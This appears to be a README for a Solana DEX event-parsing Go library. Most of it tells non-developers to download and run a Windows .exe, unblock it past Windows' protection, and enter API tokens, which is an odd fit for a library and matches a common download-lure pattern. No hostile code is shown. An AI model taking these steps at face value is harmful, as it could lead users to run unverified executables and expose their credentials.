sol-parser-sdk-golang is a Go library for reading Solana DEX events in real time. It works with Yellowstone gRPC and helps you process live stream data from Solana tools such as Raydium, Pump.fun, PumpSwap, Jito, and related event feeds.
This project is meant for users who want a fast way to handle live Solana data on Windows. If you are not a developer, you can still use the release files from the download page and run the tool with a simple setup.
- Open the release page: Download the latest version
- On the release page, find the latest file for Windows
- Download the
.exefile or the package marked for Windows - Save it to a folder you can find again, such as
DownloadsorDesktop
If the release includes a zip file, right-click it and choose Extract All before you run the program.
Before you run the app, make sure your system is ready:
- Windows 10 or Windows 11
- Internet access for live data feeds
- At least 4 GB of RAM
- Enough free space for the app and logs
- Permission to run files from your Downloads folder
If Windows blocks the file, right-click the file, then choose Properties, and look for an Unblock option near the bottom. If you see it, select it and click Apply.
Follow the steps below:
- Open the folder where you saved the file
- If the file is in a zip archive, extract it first
- Double-click the
.exefile - If Windows asks for permission, click Yes
- Wait for the app to start
If the release contains a folder with more than one file, keep the files together in the same folder. The app may need the extra files to run.
This SDK is built to help you work with Solana event data from live streams. It can support tasks such as:
- Reading DEX events as they arrive
- Watching live Solana activity
- Tracking changes from Raydium and Pump.fun style markets
- Handling fast data feeds from Yellowstone gRPC
- Supporting copy-trading bots and sniper tools
- Working with stream-based data from shred and shredstream sources
The goal is to keep event parsing fast and organized, so you can use the data in your own workflow.
You may find this useful if you want to:
- Monitor new trades in real time
- Track token launches on Pump.fun or Raydium Launchlab
- Build a bot that reacts to live market events
- Read stream data from gRPC without extra setup work
- Process Solana DEX events with less manual work
After you download and extract the release, you may see files like these:
sol-parser-sdk-golang.exe- the main app fileconfig.json- settings filelogs- folder with run historyREADME.txt- short setup helpexamples- sample files or usage notes
Keep the files in one folder unless the release notes say otherwise.
If the release is a ready-to-run app, use it like this:
- Download the latest release
- Extract the files if needed
- Open the folder
- Run the
.exefile - Enter your stream or server details if the app asks for them
- Start the live parser
If the release is a library package for another tool, place it in the same project folder as the rest of your files and follow the included example setup.
The app may ask for details such as:
- Yellowstone gRPC server address
- API token or access key
- Stream name or endpoint
- Filter for a DEX or token pair
- Output folder for saved data
Use the values from your provider or your own Solana setup.
If the app does not open:
- Make sure you extracted all files
- Check that Windows did not block the file
- Run the app again as a user with permission to open programs
- Download the release again if the file looks broken
If the app opens and closes right away:
- Keep all files in the same folder
- Check for a required config file
- Look for a missing dependency in the release notes
- Try the newest release from the download page
If the app cannot connect to the stream:
- Check your internet connection
- Make sure the server address is correct
- Confirm your access key or token
- Try again after a short wait
This project is based on topics and event paths that fit live Solana trading tools, including:
- Yellowstone gRPC
- Yellowstone gRPC for Go
- Raydium
- Raydium Launchpad
- Raydium Launchlab
- Pump.fun
- PumpSwap
- Jito
- ShredStream
- SWQoS feeds
- Copy-trading bots
- Sniper workflows
- Bonk-related event streams
- FNZero-related stream data
For best results:
- Keep your release files in one folder
- Use the latest version from the releases page
- Save your config in a place you can find again
- Restart the app after changing stream settings
- Keep your internet connection stable during live parsing
When a new release appears, repeat the same process:
- Open the release page
- Download the new Windows file
- Replace the old file if needed
- Keep your config files unless the update guide says to change them
- Run the new version
Visit the releases page to download the latest Windows version
- Repository:
sol-parser-sdk-golang - Description: High-performance Go library for parsing Solana DEX events in real-time via Yellowstone gRPC
- Topics: bonk, copy-trading-bot, fnzero, grpc, jito, letsbonk, pumpfun, pumpswap, raydium, raydium-launchlab, raydium-launchpad, shreds, shredstream, sniper, streaming, swqos, yellowstone, yellowstonegrpc, yellowstonegrpc-golang